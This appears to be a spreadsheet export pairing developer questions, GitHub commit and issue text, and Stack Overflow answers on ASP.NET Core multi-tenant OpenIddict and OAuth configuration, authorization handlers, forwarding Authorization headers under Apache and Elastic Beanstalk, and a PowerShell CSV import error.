Now, I want to add the capability for the tenants to register external OIDC identity providers (IDP) - only Azure AD IDPs for now - where they would like their user to authenticate. The application, as an oidc client, will provision the users automatically by reading the Azure AD openid token.
I have implemented a two stages login process, where the email of the user is first sent to the API which returns a login url:
the standard login url if no external idp is configured for this user
or the one for the external IDPS, which redirect the user to Azure AD authorize endpoint in fine
While redirecting the user to the Azure AD authorize endpoint, I plan to use the state to keep track of the original client request (redirect_uri, client id, pkce code challenge), and after having created/updated the user, set the session cookie and redirect to my /connect/authorize to continue the flow as normal.
First, does this approach looks reasonable to you ?
Second, it's unclear to me how I can use the OpenIddict client stack to interact with Azure AD in this scenario. Can I use it in my callback endpoint or do I have to do everything by end ? (from openid-configuration, jwks to id_token verification)
In the current version, client registrations can only be configured by being attached to OpenIddictClientOptions.Registrations: it doesn't have to be a startup-only thing - Microsoft.Extensions.Options supports reloading options using an IChangeToken (tho' it's not the simplest thing to implement) - but this technically means you need to a dynamic OpenIddictClientOptions per tenant. I don't have a sample for the client stack, but here's one for the server part that should provide a better view of what I mean: https://stackoverflow.com/a/49682427/542757 😄</t>
  </si>
  <si>
    <t>Edit: this answer was updated to use OpenIddict 4.x.
The approach suggested by McGuire will work with OpenIddict (you can access the
acr_values
property via
OpenIddictRequest.AcrValues
)
but it's not the recommended option
(it's not ideal from a security perspective: since the issuer is the same for all the tenants, they end up sharing the same signing keys).
Instead, consider running an issuer per tenant. For that, you have at least 2 options:
Give
OrchardCore's OpenID module
a try
: it's based on OpenIddict and natively supports multi-tenancy. It's still in beta but it's actively developed.
Override the options monitor used by OpenIddict to use per-tenant options
.
Here's a simplified example of the second option, using a custom monitor and path-based tenant resolution:
Implement your tenant resolution logic. E.g:
public class TenantProvider
{
    private readonly IHttpContextAccessor _httpContextAccessor;
    public TenantProvider(IHttpContextAccessor httpContextAccessor)
        =&gt; _httpContextAccessor = httpContextAccessor;
    public string GetCurrentTenant()
    {
        // This sample uses the path base as the tenant.
        // You can replace that by your own logic.
        string tenant = _httpContextAccessor.HttpContext.Request.PathBase;
        if (string.IsNullOrEmpty(tenant))
        {
            tenant = "default";
        }
        return tenant;
    }
}
public void Configure(IApplicationBuilder app)
{
    app.Use(next =&gt; context =&gt;
    {
        // This snippet uses a hardcoded resolution logic.
        // In a real world app, you'd want to customize that.
        if (context.Request.Path.StartsWithSegments("/fabrikam", out PathString path))
        {
            context.Request.PathBase = "/fabrikam";
            context.Request.Path = path;
        }
        return next(context);
    });
    app.UseDeveloperExceptionPage();
    app.UseStaticFiles();
    app.UseStatusCodePagesWithReExecute("/error");
    app.UseRouting();
    app.UseAuthentication();
    app.UseAuthorization();
    app.UseEndpoints(options =&gt;
    {
        options.MapControllers();
        options.MapDefaultControllerRoute();
    });
}
Implement a custom
IOptionsMonitor&lt;OpenIddictServerOptions&gt;
:
public class OpenIddictServerOptionsProvider : IOptionsMonitor&lt;OpenIddictServerOptions&gt;
{
    private readonly ConcurrentDictionary&lt;(string Name, string Tenant), Lazy&lt;OpenIddictServerOptions&gt;&gt; _cache;
    private readonly IOptionsFactory&lt;OpenIddictServerOptions&gt; _optionsFactory;
    private readonly TenantProvider _tenantProvider;
    public OpenIddictServerOptionsProvider(
        IOptionsFactory&lt;OpenIddictServerOptions&gt; optionsFactory,
        TenantProvider tenantProvider)
    {
        _cache = new ConcurrentDictionary&lt;(string, string), Lazy&lt;OpenIddictServerOptions&gt;&gt;();
        _optionsFactory = optionsFactory;
        _tenantProvider = tenantProvider;
    }
    public OpenIddictServerOptions CurrentValue =&gt; Get(Options.DefaultName);
    public OpenIddictServerOptions Get(string name)
    {
        var tenant = _tenantProvider.GetCurrentTenant();
        Lazy&lt;OpenIddictServerOptions&gt; Create() =&gt; new(() =&gt; _optionsFactory.Create(name));
        return _cache.GetOrAdd((name, tenant), _ =&gt; Create()).Value;
    }
    public IDisposable OnChange(Action&lt;OpenIddictServerOptions, string&gt; listener) =&gt; null;
}
Implement a custom
IConfigureNamedOptions&lt;OpenIddictServerOptions&gt;
:
public class OpenIddictServerOptionsInitializer : IConfigureNamedOptions&lt;OpenIddictServerOptions&gt;
{
    private readonly TenantProvider _tenantProvider;
    public OpenIddictServerOptionsInitializer(TenantProvider tenantProvider)
        =&gt; _tenantProvider = tenantProvider;
    public void Configure(string name, OpenIddictServerOptions options) =&gt; Configure(options);
    public void Configure(OpenIddictServerOptions options)
    {
        var tenant = _tenantProvider.GetCurrentTenant();
        // Resolve the signing credentials associated with the tenant (in a real world application,
        // the credentials would be retrieved from a persistent storage like a database or a key vault).
        options.SigningCredentials.Add(tenant switch
        {
            "fabrikam" =&gt; new(new RsaSecurityKey(RSA.Create(keySizeInBits: 2048)), SecurityAlgorithms.RsaSha256),
            _ =&gt; new(new RsaSecurityKey(RSA.Create(keySizeInBits: 2048)), SecurityAlgorithms.RsaSha256)
        });
        // Resolve the encryption credentials associated with the tenant (in a real world application,
        // the credentials would be retrieved from a persistent storage like a database or a key vault).
        options.EncryptionCredentials.Add(tenant switch
        {
            "fabrikam" =&gt; new(new RsaSecurityKey(RSA.Create(keySizeInBits: 2048)),
                SecurityAlgorithms.RsaOAEP, SecurityAlgorithms.Aes256CbcHmacSha512),
            _ =&gt; new(new RsaSecurityKey(RSA.Create(keySizeInBits: 2048)),
                SecurityAlgorithms.RsaOAEP, SecurityAlgorithms.Aes256CbcHmacSha512)
        });
        // Other tenant-specific options can be registered here.
    }
}
Register the services in your DI container:
public void ConfigureServices(IServiceCollection services)
{
    // ...
    services.AddOpenIddict()
        // Register the OpenIddict core components.
        .AddCore(options =&gt;
        {
            options.UseEntityFrameworkCore()
                   .UseDbContext&lt;ApplicationDbContext&gt;();
        })
        // Register the OpenIddict server components.
        .AddServer(options =&gt;
        {
            // Enable the authorization, device, introspection,
            // logout, token, userinfo and verification endpoints.
            options.SetAuthorizationEndpointUris("connect/authorize")
                   .SetDeviceEndpointUris("connect/device")
                   .SetIntrospectionEndpointUris("connect/introspect")
                   .SetLogoutEndpointUris("connect/logout")
                   .SetTokenEndpointUris("connect/token")
                   .SetUserinfoEndpointUris("connect/userinfo")
                   .SetVerificationEndpointUris("connect/verify");
            // Note: this sample uses the code, device code, password and refresh token flows, but you
            // can enable the other flows if you need to support implicit or client credentials.
            options.AllowAuthorizationCodeFlow()
                   .AllowDeviceCodeFlow()
                   .AllowPasswordFlow()
                   .AllowRefreshTokenFlow();
            // Mark the "email", "profile", "roles" and "demo_api" scopes as supported scopes.
            options.RegisterScopes(Scopes.Email, Scopes.Profile, Scopes.Roles, "demo_api");
            // Force client applications to use Proof Key for Code Exchange (PKCE).
            options.RequireProofKeyForCodeExchange();
            // Register the ASP.NET Core host and configure the ASP.NET Core-specific options.
            options.UseAspNetCore()
                   .EnableStatusCodePagesIntegration()
                   .EnableAuthorizationEndpointPassthrough()
                   .EnableLogoutEndpointPassthrough()
                   .EnableTokenEndpointPassthrough()
                   .EnableUserinfoEndpointPassthrough()
                   .EnableVerificationEndpointPassthrough();
        });
    services.AddSingleton&lt;TenantProvider&gt;();
    services.AddSingleton&lt;IOptionsMonitor&lt;OpenIddictServerOptions&gt;, OpenIddictServerOptionsProvider&gt;();
    services.AddSingleton&lt;IConfigureOptions&lt;OpenIddictServerOptions&gt;, OpenIddictServerOptionsInitializer&gt;();
}
To confirm this works correctly, navigate to https://localhost:[port]/fabrikam/.well-known/openid-configuration (you should get a JSON response with the OpenID Connect metadata).</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've installed the application in WSL, which starts minimized in the tray. I need to interact with the tray icon menu of the app to show the main window. Unfortunately, WSL doesn't display app icons in the Windows tray on my system.&lt;/p&gt;
&lt;p&gt;System:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Windows 10 version 22H2 (also checked on Windows 11 version 24H2).
WSL version 2.4.11.0.
Kernel version 5.15.167.4-1.
WLSg version 1.0.65.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is it possible to configure WLS/WLSg to display tray icons or is there any other way to access the app's tray menu?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C756</t>
  </si>
  <si>
    <t>New Architecture #257
Is your feature request related to a problem? Please describe.
Active Login have been existing for a few years now and since v1 we have added a bunch of features, fixed loads of bugs and improved code quality and documentation. We are about to release v4 and with every major release we have done breaking changes when those have been necessary. So far tough, the core architecture have stayed the same and the breaking changes have mostly affected those who had been doing customizations and implemented their own interfaces.
We now have a few issues and ideas for improvements that would benefit a rethinking of the architecture. Making some things more modular, moving things between packages and so on. This issue is supposed to keep track of this process, and will link to more specific issues when that is necessary.
What area is it related to
Main focus will be BankId, GrandId might follow later on.
Hi @PeterOrneholm! This is some good news. Hopefully you will consider using IOptions to configure options for BankId and GrandId when using with ASP.NET Core, so these can be configured on a per-request basis. Currently, we allow our clients to add their own external identity providers through the user interface, and settings are saved to the database. While the IOptions pattern made this possible for most provider types (OIDC, WS-Federation, SAML), when adding BankId or GrandId, clients are required to restart their IdentityServer instances for changes to take effect. Please take a closer look at this pattern here: https://docs.microsoft.com/en-us/aspnet/core/fundamentals/configuration/options?view=aspnetcore-5.0 and for a practical example on how we use this pattern to accomplish having dynamic authentication schemes, please take a look at this StackOverflow question: https://stackoverflow.com/q/61279775/828023 and my answer: https://stackoverflow.com/a/61287736/828023</t>
  </si>
  <si>
    <t>The OAuth handler uses the options pattern for configuration, which means you can utilize it to set properties such as ClientId, ClientSecret, etc, dynamically, on per-request basis, based on request properties.
You need to do the following (please bear with any compile problems, I used it with different options so writing this mostly from my head):
Modify the ConfigureServices body as follows:
public void ConfigureServices(IServiceCollection services) 
{      
  // ... 
  services.AddAuthentication(options =&gt;
  {
    options.DefaultAuthenticateScheme = CookieAuthenticationDefaults.AuthenticationScheme;
    options.DefaultSignInScheme = CookieAuthenticationDefaults.AuthenticationScheme;
    options.DefaultChallengeScheme = "Gitlab";
  }).AddCookie()
    .AddOAuth("Gitlab", delegate { }); // Don't specify hard coded OAuth options. Instead, you will return them from an options provider.
  services.AddTransient&lt;TenantResolver&gt;();
  services.AddSingleton&lt;OAuthOptionsCacheAccessor&gt;();
  services.AddTransient&lt;IConfigureNamedOptions&lt;OAuthOptions&gt;, OAuthOptionsInitializer&gt;();
  services.AddTransient&lt;IOptionsMonitor&lt;OAuthOptions&gt;, OAuthOptionsProvider&gt;();
}
Implement your tenant resolution logic based on the incoming request and register it to DI. For example:
public class TenantResolver // don't forget to register this to DI in ConfigureServices
{
    private readonly IHttpContextAccessor httpContextAccessor;
    public TenantAuthorityResolver(IHttpContextAccessor httpContextAccessor)
    {
        this.httpContextAccessor = httpContextAccessor;
    }
    public string GetCurrentTenant()
    {
        // TODO: Read the current request from httpContextAccessor.HttpContext.Request 
        // and parse it to resolve the current tenant Id based on your own logic
    }
}
Use the cache to store your instances of OAuthOptions and register it to DI as singleton. I used the ConcurrentDictionary like this:
public class OAuthOptionsCacheAccessor // register to DI as singleton
{
    public ConcurrentDictionary&lt;(string name, string tenant), Lazy&lt;OAuthOptions&gt;&gt; Cache =&gt;
        new ConcurrentDictionary&lt;(string, string), Lazy&lt;OAuthOptions&gt;&gt;();
}
Implement the options initializer which will return the correct OAuthOptions instance based on the resolved tenant, and register this class to DI as a transient dependency.
public class OAuthOptionsInitializer : IConfigureNamedOptions&lt;OAuthOptions&gt; // register as transient
{
    private readonly IDataProtectionProvider dataProtectionProvider;
    private readonly TenantResolver tenantResolver;
    public OAuthOptionsInitializer(
        IDataProtectionProvider dataProtectionProvider,
        TenantResolver tenantResolver)
    {
        this.dataProtectionProvider = dataProtectionProvider;
        this.tenantResolver = tenantResolver;
    }
    public void Configure(string name, OAuthOptions options)
    {
        if (!string.Equals(name, OpenIdConnectDefaults.AuthenticationScheme, StringComparison.Ordinal))
        {
            return;
        }
        var tenant = tenantResolver.GetCurrentTenant();
        // TODO: You will probably want to save your per-tenant OAuth options 
        // in the database or somewhere, so now is the time to obtain those.
        // I also recommend using Nito.AsyncEx to be able to safely call async methods from here
        var savedOptions = Nito.AsyncEx.AsyncContext.Run(async () =&gt; await GetSavedOptions(tenant));
        options.ClientId = savedOptions.ClientId;
        options.ClientSecret = savedOptions.ClientSecret;
        options.CallbackPath = new Microsoft.AspNetCore.Http.PathString("/signin-gitlab");
        options.AuthorizationEndpoint = savedOptions.BaseUrl + "/oauth/authorize";
        options.TokenEndpoint = savedOptions.BaseUrl + "/oauth/token";
        options.UserInformationEndpoint = savedOptions.BaseUrl + "/api/v4/user";
        options.ClaimActions.MapJsonKey(ClaimTypes.NameIdentifier, "id");
        options.ClaimActions.MapJsonKey(ClaimTypes.Name, "name");
        options.ClaimActions.MapJsonKey("gitlab:avatar_url", "avatar_url");
        options.ClaimActions.MapJsonKey("gitlab:profile_url", "web_url");
        options.SaveTokens = true;
        options.Events = new OAuthEvents
        {
            OnCreatingTicket = async context =&gt;
            {
                var request = new HttpRequestMessage(HttpMethod.Get, context.Options.UserInformationEndpoint);
                request.Headers.Accept.Add(new MediaTypeWithQualityHeaderValue("application/json"));
                request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", context.AccessToken);
                var response = await context.Backchannel.SendAsync(request, HttpCompletionOption.ResponseHeadersRead, context.HttpContext.RequestAborted);
                response.EnsureSuccessStatusCode();
                var user = JsonSerializer.Deserialize&lt;JsonElement&gt;(await response.Content.ReadAsStringAsync());
                context.RunClaimActions(user);
           }
        };
    }
    public void Configure(OpenIdConnectOptions options)
        =&gt; Debug.Fail("This infrastructure method shouldn't be called.");
}
And finally, implement the OAuth options provider and register it to DI as transient:
public class OAuthOptionsProvider : IOptionsMonitor&lt;OAuthOptions&gt;
{
    private readonly OAuthOptionsCacheAccessor cacheAccessor;
    private readonly IOptionsFactory&lt;OAuthOptions&gt; optionsFactory;
    private readonly TenantResolver tenantResolver;
    public OAuthOptionsProvider(
        IOptionsFactory&lt;OAuthOptions&gt; optionsFactory,
        TenantResolver tenantResolver,
        OAuthOptionsCacheAccessor cacheAccessor)
    {
        this.cacheAccessor = cacheAccessor;
        this.optionsFactory = optionsFactory;
        this.tenantAuthorityResolver = tenantAuthorityResolver;
    }
    public OAuthOptions CurrentValue =&gt; Get(Options.DefaultName);
    public OAuthOptions Get(string name)
    {
        var tenant = tenantResolver.GetCurrentTenant();
        Lazy&lt;OAuthOptions&gt; Create() =&gt; new Lazy&lt;OAuthOptions&gt;(() =&gt; optionsFactory.Create(name));
        return cacheAccessor.Cache.GetOrAdd((name, tenant), _ =&gt; Create()).Value;
    }
    public IDisposable OnChange(Action&lt;OAuthOptions, string&gt; listener) =&gt; null;
}
And not to forget, I want to attribute the original answer for this idea: https://stackoverflow.com/a/52977687/828023</t>
  </si>
  <si>
    <t xml:space="preserve">I want to make a more generic editor control for ASP.NET whereby I can use the same events / common code across any editor on my site. Has anyone got any experience / insight into this?
</t>
  </si>
  <si>
    <t>C757</t>
  </si>
  <si>
    <t xml:space="preserve">Skip to content
Navigation Menu
newbienewbie
InDirectLine
Type / to search
Code
Issues
Pull requests
Actions
Projects
Security
Insights
Commit 2ad14d5
Preview
Give feedback
author
itminus
authored
on Jan 8, 2020
Verified
Migrate to ASP.NET Core 3.1 (#3)
* upgrade to ASP.NET Core 3.1
* update readme
* update readme, deprecate Integration Mode
* Mig:  IHostingEnvironment -&gt; IWebHostEnvironment
* Mig: AuthorizationHandlerContext breaking changes
See https://stackoverflow.com/a/58566024/10091607
* Mig: configure authorization explicitly
* fix: httpContext has been disposed
* Fix :  new version webchat.js checks Timestamp
get "Invalid time value" when using latest webchat.js.
Need set the Timestap field for Activity
* using the latest webchat.js from CDN
* update readme
* update github action workflow
* Mig: fix that the message was shown sent twice
1. Caused by the custom Json converter is not enabled
2. See https://docs.microsoft.com/en-us/aspnet/core/web-api/advanced/formatting?view=aspnetcore-3.1#add-newtonsoftjson-based-json-format-support
* add package  to enable NewtonsoftJson for MVC
* Refactor: Change Core project a plain Library (instead of RCL)
Avoid automatically using the controllers within other projects
* Migrate to 3.1 for IntergrationSample
master(#3)
1 parent 
616ee83
 commit 
2ad14d5
File tree
Filter files
.github/workflows
dotnetcore.yml
Docs
How it works.md
Itminus.InDirectLine.Core
ApplicationBuiilderExtensions.cs
Authorization
AuthorizationHandler.cs
Controllers
ConversationsController.cs
DirectLineController.cs
Itminus.InDirectLine.Core.csproj
Middlewares
WebSocketConnectionMiddleware.cs
ServiceCollectionExtension.cs
Services
IDirectLineConnections/Core
WebSocketDirectLineConnection.cs
InDirectLineConversationHandler.cs
Itminus.InDirectLine.Samples
Itminus.InDirectLine.EchoBotApp
.vscode
launch.json
tasks.json
README.md
wwwroot
default.html
Itminus.InDirectLine.IntegrationBotSample
.vscode
launch.json
tasks.json
Itminus.InDirectLine.IntegrationBotSample.csproj
Itminus.InDirectLine.IntegrationBotSample.csproj.user
Properties
launchSettings.json
Startup.cs
appsettings.json
global.json
wwwroot
default.html
Itminus.InDirectLine.WeChat
Itminus.InDirectLine.WeChat.csproj
Itminus.InDirectLine.Web
.vscode
launch.json
Controllers
HomeController.cs
Itminus.InDirectLine.Web.csproj
Itminus.InDirectLine.Web.csproj.user
Models
ErrorViewModel.cs
Properties
launchSettings.json
Startup.cs
Views
Home
GetImages.cshtml
Index.cshtml
Privacy.cshtml
Shared
Error.cshtml
_CookieConsentPartial.cshtml
_Layout.cshtml
_ValidationScriptsPartial.cshtml
_ViewImports.cshtml
_ViewStart.cshtml
global.json
wwwroot
css
site.css
favicon.ico
js
site.js
lib
bootstrap
LICENSE
dist
css
bootstrap-grid.css
bootstrap-grid.css.map
bootstrap-grid.min.css
bootstrap-grid.min.css.map
bootstrap-reboot.css
bootstrap-reboot.css.map
bootstrap-reboot.min.css
bootstrap-reboot.min.css.map
bootstrap.css
bootstrap.css.map
bootstrap.min.css
bootstrap.min.css.map
js
bootstrap.bundle.js
bootstrap.bundle.js.map
bootstrap.bundle.min.js
bootstrap.bundle.min.js.map
bootstrap.js
bootstrap.js.map
bootstrap.min.js
bootstrap.min.js.map
jquery
LICENSE.txt
dist
jquery.js
jquery.min.js
jquery.min.map
jquery-validation
LICENSE.md
dist
additional-methods.js
additional-methods.min.js
jquery.validate.js
jquery.validate.min.js
jquery-validation-unobtrusive
LICENSE.txt
jquery.validate.unobtrusive.js
jquery.validate.unobtrusive.min.js
README.md
Some content is hidden
Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.
79 files changed
+452
-35825
lines changed
Search within code
Customizable line height
The default line height has been increased for improved accessibility. You can choose to enable a more compact line height from the view settings menu.
‎.github/workflows/dotnetcore.yml
+1
-14
Original file line number	Diff line number	Diff line change
@@ -10,7 +10,7 @@ on:
    - master
jobs:
  test:
  build:
    strategy:
      matrix:
        os: [windows-latest, ubuntu-latest, macOS-latest]
@@ -25,19 +25,6 @@ jobs:
    - name: Test 
      run: |
        dotnet test ./Itminus.InDirectLine.Core.Tests/Itminus.InDirectLine.Core.Tests.csproj
  build:
    strategy:
      matrix:
        os: [windows-latest, ubuntu-latest, macOS-latest]
        dotnet: [2.2.108]
    runs-on: ${{ matrix.os }}
    steps:
    - uses: actions/checkout@v1
    - name: Setup .NET Core
      uses: actions/setup-dotnet@v1
      with:
        dotnet-version: ${{matrix.dotnet}}
    - name: Build with dotnet
      run: |
        dotnet build ./Itminus.InDirectLine.Core/Itminus.InDirectLine.Core.csproj
‎Itminus.InDirectLine.Core/README.md  ‎Docs/How it works.md
+28
-1
Original file line number	Diff line number	Diff line change
@@ -1,4 +1,32 @@
## A Big picture
```
   +--------------------+                 +----------+
   |                    &lt;-------------+   |          |
+--|    Service  Url    |--+          |   |          |
|  |                    |  |          |   |          |
|  +--------------------+  |          |   |          |
|                          |          |   |Bot Server|
|    DirectLine   Bridge   |          |   |          |
|                          |   +------+---+--+       |
|  +--------------------+  |   |Message API  |       |
|  |                    |  |   +------^---+--+       |
+--|DirectLine Endpoints|--+          |   |          |
   |                    +-------------+   |          |
   +--------^---+-------+                 +----------+
            |   |
            |   |
            |   |
+-----------+---v------------------------------------+
|                                                    |
|               DirectLine Clients                   |
|       (e.g. WebChat/ DirectLinetClient/...)        |
|                                                    |
+----------------------------------------------------+
```
## A Detailed View
```
                     +------------------+                +-------+
@@ -21,5 +49,4 @@
|         |          |    Controller    |                |       |
|         &lt;----------+                  |                |       |
+---------+          +------------------+                +-------+
```
0 commit comments
Comments
0
 (0)
Comment
You're not receiving notifications from this thread.
</t>
  </si>
  <si>
    <t>ASP.NET Core 5+. Based on the announcement for ASP.NET Core 5.0-preview7 onwards, the Resource property is set to the current HttpContext for the request (when using endpoint routing). This means the following example will work for ASP.NET Core 5.0 onwards, without the need for IHttpContextAccessor:
public class AppKeyAuthorizationHandler : AuthorizationHandler&lt;AppKeyRequirement&gt;
{
    protected override Task HandleRequirementAsync(
        AuthorizationHandlerContext authContext, AppKeyRequirement requirement)
    {
        var httpContext = authContext.Resource as HttpContext;
        var query = httpContext.Request.Query;
        if (query.ContainsKey("key") &amp;&amp; query.ContainsKey("app"))
        {
            // ...
        }
    }
}
The RouteEndpoint is still available, using httpContext.GetEndpoint().
ASP.NET Core 3.x
In versions prior to ASP.NET Core 3.0, implementations of IAuthorizationHandler were called during the MVC pipeline. In 3.0 onwards, which uses endpoint-routing (by default), these implementations are called by the authorization middleware (UseAuthorization()). This middleware runs before the MVC pipeline, rather than as part of it.
This change means that AuthorizationFilterContext is no longer passed in to authorization handlers. Instead, it's an instance of RouteEndpoint, which doesn't provide access to the HttpContext.
In your example, you're only using AuthorizationFilterContext to get hold of HttpContext. In 3.0+, inject IHttpContextAccessor into your authorization handler and use that. Here's an example for completeness:
public class AppKeyAuthorizationHandler : AuthorizationHandler&lt;AppKeyRequirement&gt;
{
    private readonly IHttpContextAccessor httpContextAccessor;
    public AppKeyAuthorizationHandler(IHttpContextAccessor httpContextAccessor)
    {
        this.httpContextAccessor = httpContextAccessor;
    }
    protected override Task HandleRequirementAsync(
        AuthorizationHandlerContext authContext, AppKeyRequirement requirement)
    {
        var httpContext = httpContextAccessor.HttpContext;
        var query = httpContext.Request.Query;
        if (query.ContainsKey("key") &amp;&amp; query.ContainsKey("app"))
        {
            // ...
        }
    }
}
You might also need to register IHttpContextAccessor in ConfigureServices:
services.AddHttpContextAccessor();
See Use HttpContext from custom components for more information about using IHttpContextAccessor.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Problem Description:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We have upgraded our AWS EKS cluster from version 1.29 to 1.30 and also upgraded two node groups. One node group, which was created without a launch template, upgraded successfully.
However, the other node group, which was created using a launch template, failed to upgrade with the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error code: NodeCreationFailure
Error message: Couldn't proceed with upgrade process as new nodes are not joining node group abc-node-group
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We noticed that the Node AMI version has been upgraded to 1.30, but it is not able to join the cluster.&lt;/p&gt;
&lt;p&gt;Please help us resolve this issue. Let us know if any additional information is required.&lt;/p&gt;
&lt;p&gt;nodegroup has to join with our cluster.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C758</t>
  </si>
  <si>
    <t>Apply solution to Authorization being stripped from https://stackoverflow.com/questions/22279301/authorization-credentials-stripped-django-elastic-beanstalk-oauth</t>
  </si>
  <si>
    <t>I use a slightly different approach now. sahutchi's solution worked as long as env variables were not changed as Tom dickin pointed out. I dug a bit deeper inside EB and found out where the wsgi.conf template is located and added the "WSGIPassAuthorization On" option there.
commands:
  WSGIPassAuthorization:
    command: sed -i.bak '/WSGIScriptAlias/ a WSGIPassAuthorization On' config.py
    cwd: /opt/elasticbeanstalk/hooks
That will always work, even when changing environment variables. I hope you find it useful.
Edit: Seems like lots of people are still hitting this response. I haven't used ElasticBeanstalk in a while, but I would look into using Manel Clos' solution below. I haven't tried it personally, but seems a much cleaner solution. This one is literally a hack on EBs scripts and could potentially break in the future if EB updates them, specially if they move them to a different location.</t>
  </si>
  <si>
    <t xml:space="preserve">I have seen a lot of job postings for ASP.NET and server engineer positions, and they always seem to list XML and XSLT as one of the skills that is valuable to them.   I am wondering what role XML plays in modern systems.  How are people using XSLT with XML in nTier systems?
</t>
  </si>
  <si>
    <t>C759</t>
  </si>
  <si>
    <t>httpd: always forward the 'Authorization' header
On some Apache HTTPD setups where the CGI/FastCGI mode is used, the HTTP header
containing the JWT token is not forwarded, which results in the following error
when attempting to use the REST API:
  "401 Not authorized: JWT token not provided"
This patch allows forwarding the 'Authorization' header. An alternative would
be to use the `CGIPassAuth` directive to allow all authorization headers to be
forwarded.
See:
- https://secure.php.net/manual/en/features.http-auth.php#114877
- https://stackoverflow.com/questions/26475885/authorization-header-missing-in-php-post-request
- https://stackoverflow.com/questions/13387516/authorization-header-missing-in-django-rest-framework-is-apache-to-blame
- https://stackoverflow.com/questions/17018586/apache-2-4-php-fpm-and-authorization-headers
- https://httpd.apache.org/docs/2.4/en/mod/core.html#cgipassauth</t>
  </si>
  <si>
    <t>Somehow, the Authorization header was stripped away. By adding the following lines in my .htaccess, I was able to get it to work.
RewriteEngine On
RewriteCond %{HTTP:Authorization} ^(.*)
RewriteRule .* - [e=HTTP_AUTHORIZATION:%1]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a report that I have automated. the report is a CSV file, and it is split every 80,000 lines, so I regularly end up with reports in multiple parts. I have a large function that processes the report perfectly fine when I have a single file, but I am having issues with ingesting multiple files at the same time. The report filenames are formatted as such:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Part_1.csv
Part_2.csv
Part_3.csv
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I'm doing is getting the last downloaded file, and checking to see how many parts it had, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$FileName = Get-ChildItem $env:USERPROFILE\Downloads | where Extension -like .csv | Sort-Object -Property LastWriteTime -Descending | Select-Object -First 1
$FileCount = [int]$FileName.basename.substring($FileName.Basename.Length-1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the I get isn't &lt;code&gt;Part_1.csv&lt;/code&gt; I know I need to load multiple files, and I'm doing that with this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; if ($FileCount -ne &amp;quot;1&amp;quot;)
        {
        $List = Get-ChildItem $env:USERPROFILE\Downloads | where Extension -like .csv | Sort-Object -Property LastWriteTime -Descending | Select-Object -First $FileCount | Sort-object       
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After this step, &lt;code&gt;$List&lt;/code&gt; contains the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PS C:\&amp;gt; $List
    Directory: C:\Users\username\Downloads
Mode                LastWriteTime         Length Name                                                                                                                                  
----                -------------         ------ ----                                                                                                                                  
-a----        2/18/2025   3:25 PM       16930338 Report_Part_1.csv
-a----        2/18/2025   3:25 PM       16930338 Report_Part_2.csv                                                                                                
-a----        2/18/2025   3:26 PM        1448835 Report_Part_3.csv                                                                                                  
PS C:\&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I then load each different part of the report with a foreach loop:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Foreach($File in $List.FullName)
    {
    $Object += Import-Csv -Path $File
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's this entire part of the script in one block for you.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$Object = @()
$FileName = Get-ChildItem $env:USERPROFILE\Downloads | where Extension -like .csv | Sort-Object -Property LastWriteTime -Descending | Select-Object -First 1
$FileCount = [int]$FileName.basename.substring($FileName.Basename.Length-1)
if ($FileCount -ne &amp;quot;1&amp;quot;)
    {
    $List = Get-ChildItem $env:USERPROFILE\Downloads | where Extension -like .csv | Sort-Object -Property LastWriteTime -Descending | Select-Object -First $FileCount | Sort-object
    Foreach($File in $List.FullName)
        {
        $Object += Import-Csv -Path $File
        }
    }
Else
    {
    $Object = Import-Csv -Path $FileName.FullName
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's the kicker, if I run this isolated, all by itself, it works exactly how I expected it to. &lt;code&gt;$Object&lt;/code&gt; contains all of the data from each part. but as soon as I put this at the top of my function that actually processes the report:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Function Read-Report
    {
    $Object = @()
    $FileName = Get-ChildItem $env:USERPROFILE\Downloads | where Extension -like .csv | Sort-Object -Property LastWriteTime -Descending | Select-Object -First 1
    $FileCount = [int]$FileName.basename.substring($FileName.Basename.Length-1)
    if ($FileCount -ne &amp;quot;1&amp;quot;)
        {
        $List = Get-ChildItem $env:USERPROFILE\Downloads | where Extension -like .csv | Sort-Object -Property LastWriteTime -Descending | Select-Object -First $FileCount | Sort-object #([int]::Parse($filename.basename.substring($Filename.Basename.Length-1))) | Sort-Object
        Foreach($File in $List.FullName)
            {
            $Object += Import-Csv -Path $File
            }
        }
    Else
        {
        $Object = Import-Csv -Path $FileName.FullName
        }
#Working report processing script continues below
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get an error on the line that contains &lt;code&gt;Foreach($File in $List.FullName)&lt;/code&gt; stating:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Cannot convert the &amp;quot;C:\Users\username\Downloads\Report_Part_1.csv&amp;quot; value of type &amp;quot;System.String&amp;quot; to type &amp;quot;System.Management.Automation.SwitchParameter&amp;quot;.
At C:\Users\username\Documents\Scripting\Powershell\ReportsFunctions.ps1:43 char:17
+         Foreach($File in $List.FullName)
+                 ~~~~~
    + CategoryInfo          : InvalidArgument: (:) [], RuntimeException
    + FullyQualifiedErrorId : ConvertToFinalInvalidCastException
&lt;/code&gt;&lt;/pre&gt;
